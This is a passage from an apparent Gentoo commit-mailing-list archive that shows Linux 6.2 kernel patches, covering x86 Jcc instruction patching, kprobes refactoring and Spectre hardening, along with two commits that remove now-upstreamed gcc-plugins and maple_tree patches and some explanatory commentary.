+diff --git a/arch/x86/include/asm/text-patching.h b/arch/x86/include/asm/text-patching.h
+index f4b87f08f5c50..29832c338cdc5 100644
+--- a/arch/x86/include/asm/text-patching.h
++++ b/arch/x86/include/asm/text-patching.h
+@@ -184,6 +184,37 @@ void int3_emulate_ret(struct pt_regs *regs)
+ 	unsigned long ip = int3_emulate_pop(regs);
+ 	int3_emulate_jmp(regs, ip);
+ }
++
++static __always_inline
++void int3_emulate_jcc(struct pt_regs *regs, u8 cc, unsigned long ip, unsigned long disp)
++{
++	static const unsigned long jcc_mask[6] = {
++		[0] = X86_EFLAGS_OF,
++		[1] = X86_EFLAGS_CF,
++		[2] = X86_EFLAGS_ZF,
++		[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
++		[4] = X86_EFLAGS_SF,
++		[5] = X86_EFLAGS_PF,
++	};
++
++	bool invert = cc & 1;
++	bool match;
++
++	if (cc < 0xc) {
++		match = regs->flags & jcc_mask[cc >> 1];
++	} else {
++		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
++			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
++		if (cc >= 0xe)
++			match = match || (regs->flags & X86_EFLAGS_ZF);
++	}
++
++	if ((match && !invert) || (!match && invert))
++		ip += disp;
++
++	int3_emulate_jmp(regs, ip);
++}
++
+ #endif /* !CONFIG_UML_X86 */
+ 
+ #endif /* _ASM_X86_TEXT_PATCHING_H */
+diff --git a/arch/x86/kernel/alternative.c b/arch/x86/kernel/alternative.c
+index 7d8c3cbde3685..81381a0194f39 100644
+--- a/arch/x86/kernel/alternative.c
++++ b/arch/x86/kernel/alternative.c
+@@ -340,6 +340,12 @@ next:
+ 	}
+ }
+ 
++static inline bool is_jcc32(struct insn *insn)
++{
++	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
++	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
++}
++
+ #if defined(CONFIG_RETPOLINE) && defined(CONFIG_OBJTOOL)
+ 
+ /*
+@@ -378,12 +384,6 @@ static int emit_indirect(int op, int reg, u8 *bytes)
+ 	return i;
+ }
+ 
+-static inline bool is_jcc32(struct insn *insn)
+-{
+-	/* Jcc.d32 second opcode byte is in the range: 0x80-0x8f */
+-	return insn->opcode.bytes[0] == 0x0f && (insn->opcode.bytes[1] & 0xf0) == 0x80;
+-}
+-
+ static int emit_call_track_retpoline(void *addr, struct insn *insn, int reg, u8 *bytes)
+ {
+ 	u8 op = insn->opcode.bytes[0];
+@@ -1772,6 +1772,11 @@ void text_poke_sync(void)
+ 	on_each_cpu(do_sync_core, NULL, 1);
+ }
+ 
++/*
++ * NOTE: crazy scheme to allow patching Jcc.d32 but not increase the size of
++ * this thing. When len == 6 everything is prefixed with 0x0f and we map
++ * opcode to Jcc.d8, using len to distinguish.
++ */
+ struct text_poke_loc {
+ 	/* addr := _stext + rel_addr */
+ 	s32 rel_addr;
+@@ -1893,6 +1898,10 @@ noinstr int poke_int3_handler(struct pt_regs *regs)
+ 		int3_emulate_jmp(regs, (long)ip + tp->disp);
+ 		break;
+ 
++	case 0x70 ... 0x7f: /* Jcc */
++		int3_emulate_jcc(regs, tp->opcode & 0xf, (long)ip, tp->disp);
++		break;
++
+ 	default:
+ 		BUG();
+ 	}
+@@ -1966,16 +1975,26 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * Second step: update all but the first byte of the patched range.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		u8 old[POKE_MAX_OPCODE_SIZE] = { tp[i].old, };
++		u8 old[POKE_MAX_OPCODE_SIZE+1] = { tp[i].old, };
++		u8 _new[POKE_MAX_OPCODE_SIZE+1];
++		const u8 *new = tp[i].text;
+ 		int len = tp[i].len;
+ 
+ 		if (len - INT3_INSN_SIZE > 0) {
+ 			memcpy(old + INT3_INSN_SIZE,
+ 			       text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+ 			       len - INT3_INSN_SIZE);
++
++			if (len == 6) {
++				_new[0] = 0x0f;
++				memcpy(_new + 1, new, 5);
++				new = _new;
++			}
++
+ 			text_poke(text_poke_addr(&tp[i]) + INT3_INSN_SIZE,
+-				  (const char *)tp[i].text + INT3_INSN_SIZE,
++				  new + INT3_INSN_SIZE,
+ 				  len - INT3_INSN_SIZE);
++
+ 			do_sync++;
+ 		}
+ 
+@@ -2003,8 +2022,7 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 		 * The old instruction is recorded so that the event can be
+ 		 * processed forwards or backwards.
+ 		 */
+-		perf_event_text_poke(text_poke_addr(&tp[i]), old, len,
+-				     tp[i].text, len);
++		perf_event_text_poke(text_poke_addr(&tp[i]), old, len, new, len);
+ 	}
+ 
+ 	if (do_sync) {
+@@ -2021,10 +2039,15 @@ static void text_poke_bp_batch(struct text_poke_loc *tp, unsigned int nr_entries
+ 	 * replacing opcode.
+ 	 */
+ 	for (do_sync = 0, i = 0; i < nr_entries; i++) {
+-		if (tp[i].text[0] == INT3_INSN_OPCODE)
++		u8 byte = tp[i].text[0];
++
++		if (tp[i].len == 6)
++			byte = 0x0f;
++
++		if (byte == INT3_INSN_OPCODE)
+ 			continue;
+ 
+-		text_poke(text_poke_addr(&tp[i]), tp[i].text, INT3_INSN_SIZE);
++		text_poke(text_poke_addr(&tp[i]), &byte, INT3_INSN_SIZE);
+ 		do_sync++;
+ 	}
+ 
+@@ -2042,9 +2065,11 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 			       const void *opcode, size_t len, const void *emulate)
+ {
+ 	struct insn insn;
+-	int ret, i;
++	int ret, i = 0;
+ 
+-	memcpy((void *)tp->text, opcode, len);
++	if (len == 6)
++		i = 1;
++	memcpy((void *)tp->text, opcode+i, len-i);
+ 	if (!emulate)
+ 		emulate = opcode;
+ 
+@@ -2055,6 +2080,13 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	tp->len = len;
+ 	tp->opcode = insn.opcode.bytes[0];
+ 
++	if (is_jcc32(&insn)) {
++		/*
++		 * Map Jcc.d32 onto Jcc.d8 and use len to distinguish.
++		 */
++		tp->opcode = insn.opcode.bytes[1] - 0x10;
++	}
++
+ 	switch (tp->opcode) {
+ 	case RET_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+@@ -2071,7 +2103,6 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 		BUG_ON(len != insn.length);
+ 	}
+ 
+-
+ 	switch (tp->opcode) {
+ 	case INT3_INSN_OPCODE:
+ 	case RET_INSN_OPCODE:
+@@ -2080,6 +2111,7 @@ static void text_poke_loc_init(struct text_poke_loc *tp, void *addr,
+ 	case CALL_INSN_OPCODE:
+ 	case JMP32_INSN_OPCODE:
+ 	case JMP8_INSN_OPCODE:
++	case 0x70 ... 0x7f: /* Jcc */
+ 		tp->disp = insn.immediate.value;
+ 		break;
+ 
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index 695873c0f50b5..0ce969ae250f7 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -464,50 +464,26 @@ static void kprobe_emulate_call(struct kprobe *p, struct pt_regs *regs)
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_call);
+ 
+-static nokprobe_inline
+-void __kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs, bool cond)
++static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+ {
+ 	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (cond)
+-		ip += p->ainsn.rel32;
++	ip += p->ainsn.rel32;
+ 	int3_emulate_jmp(regs, ip);
+ }
+-
+-static void kprobe_emulate_jmp(struct kprobe *p, struct pt_regs *regs)
+-{
+-	__kprobe_emulate_jmp(p, regs, true);
+-}
+ NOKPROBE_SYMBOL(kprobe_emulate_jmp);
+ 
+-static const unsigned long jcc_mask[6] = {
+-	[0] = X86_EFLAGS_OF,
+-	[1] = X86_EFLAGS_CF,
+-	[2] = X86_EFLAGS_ZF,
+-	[3] = X86_EFLAGS_CF | X86_EFLAGS_ZF,
+-	[4] = X86_EFLAGS_SF,
+-	[5] = X86_EFLAGS_PF,
+-};
+-
+ static void kprobe_emulate_jcc(struct kprobe *p, struct pt_regs *regs)
+ {
+-	bool invert = p->ainsn.jcc.type & 1;
+-	bool match;
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 
+-	if (p->ainsn.jcc.type < 0xc) {
+-		match = regs->flags & jcc_mask[p->ainsn.jcc.type >> 1];
+-	} else {
+-		match = ((regs->flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
+-			((regs->flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
+-		if (p->ainsn.jcc.type >= 0xe)
+-			match = match || (regs->flags & X86_EFLAGS_ZF);
+-	}
+-	__kprobe_emulate_jmp(p, regs, (match && !invert) || (!match && invert));
++	int3_emulate_jcc(regs, p->ainsn.jcc.type, ip, p->ainsn.rel32);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_jcc);
+ 
+ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ {
++	unsigned long ip = regs->ip - INT3_INSN_SIZE + p->ainsn.size;
+ 	bool match;
+ 
+ 	if (p->ainsn.loop.type != 3) {	/* LOOP* */
+@@ -535,7 +511,9 @@ static void kprobe_emulate_loop(struct kprobe *p, struct pt_regs *regs)
+ 	else if (p->ainsn.loop.type == 1)	/* LOOPE */
+ 		match = match && (regs->flags & X86_EFLAGS_ZF);
+ 
+-	__kprobe_emulate_jmp(p, regs, match);
++	if (match)
++		ip += p->ainsn.rel32;
++	int3_emulate_jmp(regs, ip);
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_loop);
+ 
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index 2ebc338980bcd..b70670a985978 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -9,6 +9,7 @@ enum insn_type {
+ 	NOP = 1,  /* site cond-call */
+ 	JMP = 2,  /* tramp / site tail-call */
+ 	RET = 3,  /* tramp / site cond-tail-call */
++	JCC = 4,
+ };
+ 
+ /*
+@@ -25,12 +26,40 @@ static const u8 xor5rax[] = { 0x2e, 0x2e, 0x2e, 0x31, 0xc0 };
+ 
+ static const u8 retinsn[] = { RET_INSN_OPCODE, 0xcc, 0xcc, 0xcc, 0xcc };
+ 
++static u8 __is_Jcc(u8 *insn) /* Jcc.d32 */
++{
++	u8 ret = 0;
++
++	if (insn[0] == 0x0f) {
++		u8 tmp = insn[1];
++		if ((tmp & 0xf0) == 0x80)
++			ret = tmp;
++	}
++
++	return ret;
++}
++
++extern void __static_call_return(void);
++
++asm (".global __static_call_return\n\t"
++     ".type __static_call_return, @function\n\t"
++     ASM_FUNC_ALIGN "\n\t"
++     "__static_call_return:\n\t"
++     ANNOTATE_NOENDBR
++     ANNOTATE_RETPOLINE_SAFE
++     "ret; int3\n\t"
++     ".size __static_call_return, . - __static_call_return \n\t");
++
+ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 					  void *func, bool modinit)
+ {
+ 	const void *emulate = NULL;
+ 	int size = CALL_INSN_SIZE;
+ 	const void *code;
++	u8 op, buf[6];
++
++	if ((type == JMP || type == RET) && (op = __is_Jcc(insn)))
++		type = JCC;
+ 
+ 	switch (type) {
+ 	case CALL:
+@@ -57,6 +86,20 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 		else
+ 			code = &retinsn;
+ 		break;
++
++	case JCC:
++		if (!func) {
++			func = __static_call_return;
++			if (cpu_feature_enabled(X86_FEATURE_RETHUNK))
++				func = x86_return_thunk;
++		}
++
++		buf[0] = 0x0f;
++		__text_gen_insn(buf+1, op, insn+1, func, 5);
++		code = buf;
++		size = 6;
++
++		break;
+ 	}
+ 
+ 	if (memcmp(insn, code, size) == 0)
+@@ -68,9 +111,9 @@ static void __ref __static_call_transform(void *insn, enum insn_type type,
+ 	text_poke_bp(insn, code, size, emulate);
+ }
+ 
+-static void __static_call_validate(void *insn, bool tail, bool tramp)
++static void __static_call_validate(u8 *insn, bool tail, bool tramp)
+ {
+-	u8 opcode = *(u8 *)insn;
++	u8 opcode = insn[0];
+ 
+ 	if (tramp && memcmp(insn+5, tramp_ud, 3)) {
+ 		pr_err("trampoline signature fail");
+@@ -79,7 +122,8 @@ static void __static_call_validate(void *insn, bool tail, bool tramp)
+ 
+ 	if (tail) {
+ 		if (opcode == JMP32_INSN_OPCODE ||
+-		    opcode == RET_INSN_OPCODE)
++		    opcode == RET_INSN_OPCODE ||
++		    __is_Jcc(insn))
+ 			return;
+ 	} else {
+ 		if (opcode == CALL_INSN_OPCODE ||
+diff --git a/drivers/hid/hid-mcp2221.c b/drivers/hid/hid-mcp2221.c
+index e61dd039354b8..f74a977cf8f87 100644
+--- a/drivers/hid/hid-mcp2221.c
++++ b/drivers/hid/hid-mcp2221.c
+@@ -922,6 +922,9 @@ static void mcp2221_hid_unregister(void *ptr)
+ /* This is needed to be sure hid_hw_stop() isn't called twice by the subsystem */
+ static void mcp2221_remove(struct hid_device *hdev)
+ {
++	struct mcp2221 *mcp = hid_get_drvdata(hdev);
++
++	cancel_delayed_work_sync(&mcp->init_work);
+ }
+ 
+ #if IS_REACHABLE(CONFIG_IIO)
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index b8dc3b5c9ad94..9f506efa53705 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -480,6 +480,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ };
+ 
+ static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+ 	{ }
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index c375498c40717..6d89528c31779 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -6,6 +6,7 @@
+ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
++	depends on POWER_SUPPLY
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/nvidia-wmi-ec-backlight.c b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+index baccdf6585382..1b572c90c76ec 100644
+--- a/drivers/platform/x86/nvidia-wmi-ec-backlight.c
++++ b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+@@ -12,6 +12,10 @@
+ #include <linux/wmi.h>
+ #include <acpi/video.h>
+ 
++static bool force;
++module_param(force, bool, 0444);
++MODULE_PARM_DESC(force, "Force loading (disable acpi_backlight=xxx checks)");
++
+ /**
+  * wmi_brightness_notify() - helper function for calling WMI-wrapped ACPI method
+  * @w:    Pointer to the struct wmi_device identified by %WMI_BRIGHTNESS_GUID
+@@ -91,7 +95,7 @@ static int nvidia_wmi_ec_backlight_probe(struct wmi_device *wdev, const void *ct
+ 	int ret;
+ 
+ 	/* drivers/acpi/video_detect.c also checks that SOURCE == EC */
+-	if (acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
++	if (!force && acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
+ 		return -ENODEV;
+ 
+ 	/*
+diff --git a/fs/ext4/sysfs.c b/fs/ext4/sysfs.c
+index d233c24ea3425..e2b8b3437c589 100644
+--- a/fs/ext4/sysfs.c
++++ b/fs/ext4/sysfs.c
+@@ -491,6 +491,11 @@ static void ext4_sb_release(struct kobject *kobj)
+ 	complete(&sbi->s_kobj_unregister);
+ }
+ 
++static void ext4_feat_release(struct kobject *kobj)
++{
++	kfree(kobj);
++}
++
+ static const struct sysfs_ops ext4_attr_ops = {
+ 	.show	= ext4_attr_show,
+ 	.store	= ext4_attr_store,
+@@ -505,7 +510,7 @@ static struct kobj_type ext4_sb_ktype = {
+ static struct kobj_type ext4_feat_ktype = {
+ 	.default_groups = ext4_feat_groups,
+ 	.sysfs_ops	= &ext4_attr_ops,
+-	.release	= (void (*)(struct kobject *))kfree,
++	.release	= ext4_feat_release,
+ };
+ 
+ void ext4_notify_error_sysfs(struct ext4_sb_info *sbi)
+diff --git a/include/linux/nospec.h b/include/linux/nospec.h
+index c1e79f72cd892..9f0af4f116d98 100644
+--- a/include/linux/nospec.h
++++ b/include/linux/nospec.h
+@@ -11,6 +11,10 @@
+ 
+ struct task_struct;
+ 
++#ifndef barrier_nospec
++# define barrier_nospec() do { } while (0)
++#endif
++
+ /**
+  * array_index_mask_nospec() - generate a ~0 mask when index < size, 0 otherwise
+  * @index: array element index
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index ba3fff17e2f9f..f9c3b1033ec39 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -34,6 +34,7 @@
+ #include <linux/log2.h>
+ #include <linux/bpf_verifier.h>
+ #include <linux/nodemask.h>
++#include <linux/nospec.h>
+ #include <linux/bpf_mem_alloc.h>
+ 
+ #include <asm/barrier.h>
+@@ -1910,9 +1911,7 @@ out:
+ 		 * reuse preexisting logic from Spectre v1 mitigation that
+ 		 * happens to produce the required code on x86 for v4 as well.
+ 		 */
+-#ifdef CONFIG_X86
+ 		barrier_nospec();
+-#endif
+ 		CONT;
+ #define LDST(SIZEOP, SIZE)						\
+ 	STX_MEM_##SIZEOP:						\
+diff --git a/lib/usercopy.c b/lib/usercopy.c
+index 1505a52f23a01..d29fe29c68494 100644
+--- a/lib/usercopy.c
++++ b/lib/usercopy.c
+@@ -3,6 +3,7 @@
+ #include <linux/fault-inject-usercopy.h>
+ #include <linux/instrumented.h>
+ #include <linux/uaccess.h>
++#include <linux/nospec.h>
+ 
+ /* out-of-line parts */
+ 
+@@ -12,6 +13,12 @@ unsigned long _copy_from_user(void *to, const void __user *from, unsigned long n
+ 	unsigned long res = n;
+ 	might_fault();
+ 	if (!should_fail_usercopy() && likely(access_ok(from, n))) {
++		/*
++		 * Ensure that bad access_ok() speculation will not
++		 * lead to nasty side effects *after* the copy is
++		 * finished:
++		 */
++		barrier_nospec();
+ 		instrument_copy_from_user_before(to, from, n);
+ 		res = raw_copy_from_user(to, from, n);
+ 		instrument_copy_from_user_after(to, from, n, res);
+diff --git a/security/Kconfig.hardening b/security/Kconfig.hardening
+index 53baa95cb644f..0f295961e7736 100644
+--- a/security/Kconfig.hardening
++++ b/security/Kconfig.hardening
+@@ -281,6 +281,9 @@ endmenu
+ 
+ config CC_HAS_RANDSTRUCT
+ 	def_bool $(cc-option,-frandomize-layout-seed-file=/dev/null)
++	# Randstruct was first added in Clang 15, but it isn't safe to use until
++	# Clang 16 due to https://github.com/llvm/llvm-project/issues/60349
++	depends on !CC_IS_CLANG || CLANG_VERSION >= 160000
+ 
+ choice
+ 	prompt "Randomize layout of sensitive kernel structures"


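The heart of the Jcc patching series above is the condition-code test that
int3_emulate_jcc(), kprobe_emulate_jcc() and the static_call path all share:
the low nibble of the Jcc opcode selects an EFLAGS predicate, bit 0 of the
nibble inverts it, and nibbles 0xc-0xf use the signed-comparison rule SF ^ OF
(folding in ZF for JLE/JG). A stand-alone user-space sketch of that logic,
illustrative only, with the architectural EFLAGS bit values redefined locally:

#include <stdbool.h>
#include <stdio.h>

#define X86_EFLAGS_CF		0x0001UL
#define X86_EFLAGS_PF		0x0004UL
#define X86_EFLAGS_ZF		0x0040UL
#define X86_EFLAGS_SF		0x0080UL
#define X86_EFLAGS_OF		0x0800UL
#define X86_EFLAGS_SF_BIT	7
#define X86_EFLAGS_OF_BIT	11

/* cc is the low nibble of the Jcc opcode (0x7<cc>, or 0x0f 0x8<cc> for .d32) */
static bool jcc_taken(unsigned long flags, unsigned char cc)
{
	static const unsigned long jcc_mask[6] = {
		X86_EFLAGS_OF,			/* JO  */
		X86_EFLAGS_CF,			/* JB  */
		X86_EFLAGS_ZF,			/* JE  */
		X86_EFLAGS_CF | X86_EFLAGS_ZF,	/* JBE */
		X86_EFLAGS_SF,			/* JS  */
		X86_EFLAGS_PF,			/* JP  */
	};
	bool invert = cc & 1;	/* odd nibble negates the condition */
	bool match;

	if (cc < 0xc) {
		match = flags & jcc_mask[cc >> 1];
	} else {
		/* signed compares: SF != OF means "less than" */
		match = ((flags & X86_EFLAGS_SF) >> X86_EFLAGS_SF_BIT) ^
			((flags & X86_EFLAGS_OF) >> X86_EFLAGS_OF_BIT);
		if (cc >= 0xe)	/* JLE (0xe) / JG (0xf) also fold in ZF */
			match = match || (flags & X86_EFLAGS_ZF);
	}
	return (match && !invert) || (!match && invert);
}

int main(void)
{
	printf("JE  with ZF=1: %d\n", jcc_taken(X86_EFLAGS_ZF, 0x4));	/* 1 */
	printf("JNE with ZF=1: %d\n", jcc_taken(X86_EFLAGS_ZF, 0x5));	/* 0 */
	printf("JL  with SF=1 OF=0: %d\n", jcc_taken(X86_EFLAGS_SF, 0xc)); /* 1 */
	return 0;
}

This same nibble encoding is what lets text_poke_loc_init() map Jcc.d32
(0x0f 0x8<cc>) onto the short opcode 0x7<cc> via insn.opcode.bytes[1] - 0x10
and later use len == 6 to tell the two forms apart.
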
^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-19 22:41 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-19 22:41 UTC (permalink / raw)
  To: gentoo-commits

commit:     cdcf26623002d178b35231377a43ead33904784c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 19 22:41:33 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 19 22:41:33 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cdcf2662

Remove redundant patch

Removed:
2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ---
 ..._gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch | 41 ----------------------
 2 files changed, 45 deletions(-)

diff --git a/0000_README b/0000_README
index f16c77ca..8bb95e22 100644
--- a/0000_README
+++ b/0000_README
@@ -71,10 +71,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
-From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
-Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch b/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
deleted file mode 100644
index 0b454ec8..00000000
--- a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-gcc-plugins: Reorganize gimple includes for GCC 13
-
-The gimple-iterator.h header must be included before gimple-fold.h
-starting with GCC 13. Reorganize gimple headers to work for all GCC
-versions.
-
-Reported-by: Palmer Dabbelt <palmer@rivosinc.com>
-Link: https://lore.kernel.org/all/20230113173033.4380-1-palmer@rivosinc.com/
-Cc: linux-hardening@vger.kernel.org
-Signed-off-by: Kees Cook <keescook@chromium.org>
----
- scripts/gcc-plugins/gcc-common.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
-index 9a1895747b15..84c730da36dd 100644
---- a/scripts/gcc-plugins/gcc-common.h
-+++ b/scripts/gcc-plugins/gcc-common.h
-@@ -71,7 +71,9 @@
- #include "varasm.h"
- #include "stor-layout.h"
- #include "internal-fn.h"
-+#include "gimple.h"
- #include "gimple-expr.h"
-+#include "gimple-iterator.h"
- #include "gimple-fold.h"
- #include "context.h"
- #include "tree-ssa-alias.h"
-@@ -85,10 +87,8 @@
- #include "tree-eh.h"
- #include "stmt.h"
- #include "gimplify.h"
--#include "gimple.h"
- #include "tree-phinodes.h"
- #include "tree-cfg.h"
--#include "gimple-iterator.h"
- #include "gimple-ssa.h"
- #include "ssa-iterators.h"
- 
--- 
-2.34.1


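The removed (now upstreamed) patch encodes a pure include-ordering
constraint. Consolidating its two hunks, the resulting order in
gcc-common.h is, as an illustrative excerpt:

/* works on GCC <= 12 and on GCC 13, where gimple-fold.h started
 * depending on gimple.h and gimple-iterator.h being included first */
#include "gimple.h"
#include "gimple-expr.h"
#include "gimple-iterator.h"
#include "gimple-fold.h"
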
^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-19 22:39 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-19 22:39 UTC (permalink / raw)
  To: gentoo-commits

commit:     5241ddd6b8b8c9729a51139525ff50ab4a7bf589
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Feb 19 22:39:06 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 19 22:39:06 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5241ddd6

Remove redundant patch

Removed:
1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...ee-fix-mas-empty-area-rev-lower-bound-val.patch | 82 ----------------------
 2 files changed, 86 deletions(-)

diff --git a/0000_README b/0000_README
index 22c89532..f16c77ca 100644
--- a/0000_README
+++ b/0000_README
@@ -55,10 +55,6 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
-Patch:  1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
-From:		https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git
-Desc:		maple_tree: fix mas_empty_area_rev() lower bound validation
-
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch b/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
deleted file mode 100644
index 53075739..00000000
--- a/1800_maple-tree-fix-mas-empty-area-rev-lower-bound-val.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From ebc4c1bcc2a513bb2292dc73aa247b046bc846ce Mon Sep 17 00:00:00 2001
-From: Liam Howlett <liam.howlett@oracle.com>
-Date: Wed, 11 Jan 2023 20:02:07 +0000
-Subject: maple_tree: fix mas_empty_area_rev() lower bound validation
-
-mas_empty_area_rev() was not correctly validating the start of a gap
-against the lower limit.  This could lead to the range starting lower than
-the requested minimum.
-
-Fix the issue by better validating a gap once one is found.
-
-This commit also adds tests to the maple tree test suite for this issue
-and tests the mas_empty_area() function for similar bound checking.
-
-Link: https://lkml.kernel.org/r/20230111200136.1851322-1-Liam.Howlett@oracle.com
-Link: https://bugzilla.kernel.org/show_bug.cgi?id=216911
-Fixes: 54a611b60590 ("Maple Tree: add new data structure")
-Signed-off-by: Liam R. Howlett <Liam.Howlett@oracle.com>
-Reported-by: <amanieu@gmail.com>
-  Link: https://lore.kernel.org/linux-mm/0b9f5425-08d4-8013-aa4c-e620c3b10bb2@leemhuis.info/
-Tested-by: Holger Hoffstätte <holger@applied-asynchrony.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
----
- lib/maple_tree.c | 17 ++++++++---------
- 1 file changed, 8 insertions(+), 9 deletions(-)
-
-(limited to 'lib/maple_tree.c')
-
-diff --git a/lib/maple_tree.c b/lib/maple_tree.c
-index 26e2045d3cda9..b990ccea454ec 100644
---- a/lib/maple_tree.c
-+++ b/lib/maple_tree.c
-@@ -4887,7 +4887,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 	unsigned long *pivots, *gaps;
- 	void __rcu **slots;
- 	unsigned long gap = 0;
--	unsigned long max, min, index;
-+	unsigned long max, min;
- 	unsigned char offset;
- 
- 	if (unlikely(mas_is_err(mas)))
-@@ -4909,8 +4909,7 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
- 		min = mas_safe_min(mas, pivots, --offset);
- 
- 	max = mas_safe_pivot(mas, pivots, offset, type);
--	index = mas->index;
--	while (index <= max) {
-+	while (mas->index <= max) {
- 		gap = 0;
- 		if (gaps)
- 			gap = gaps[offset];
-@@ -4941,10 +4940,8 @@ static bool mas_rev_awalk(struct ma_state *mas, unsigned long size)
